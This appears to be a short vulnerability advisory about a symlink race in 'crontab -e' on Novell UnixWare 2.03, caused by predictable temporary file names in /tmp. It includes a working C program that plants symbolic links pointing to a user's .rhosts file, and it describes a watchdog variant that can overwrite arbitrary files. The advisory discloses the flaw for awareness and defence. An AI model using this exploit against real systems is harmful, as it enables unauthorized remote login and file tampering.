|
Vulnerability crontab Affected Novell UnixWare 2.03 (UNIX System V Release 4.2 MP), possibly other versions of UnixWare. Description 'crontab -e' command creates a temporary file in /tmp to pass the crontab file for editing with a text editor. The name of the file is easily guessable and it seems to be based on process ID (e.g. /tmp/crontaba00421). 'crontab -e' doesn't check if the file already exists in /tmp and will gladly follow any symbolic links there might be waiting. A malicious user can create a bunch of symbolic links in /tmp with a little C program, if he knows that someone is going to edit his/her crontab file. The code might be something like this: #include <stdio.h> #include <unistd.h> char *foo="0123456789ABCDEF"; int main ( void ) { char *ps1, *ps2, s[32]; for (ps1=foo;*ps1;ps1++) for (ps2=foo;*ps2;ps2++) { sprintf(s,"/tmp/crontaba002%c%c",*ps1,*ps2); symlink("/home/joe/.rhosts",s); } } Now when joe edit his crontab file, it will be saved as .rhosts in his home directory. This is dangerous, because crontab files often include nice characters like '*' which act as a wildcard in .rhosts. The user doesn't have to be joe. A malicious user might build a watchdog which replaces the symbolic link with a new (e.g. /home/sam/.rhosts) while user is editing his crontab file (a watchdog which seeks for processes like 'crontab -e' and 'pico /tmp/crontab*' By replacing the symbolic link while user is editing the crontab file, a malicious user might also be able to overwrite any file owned by the user.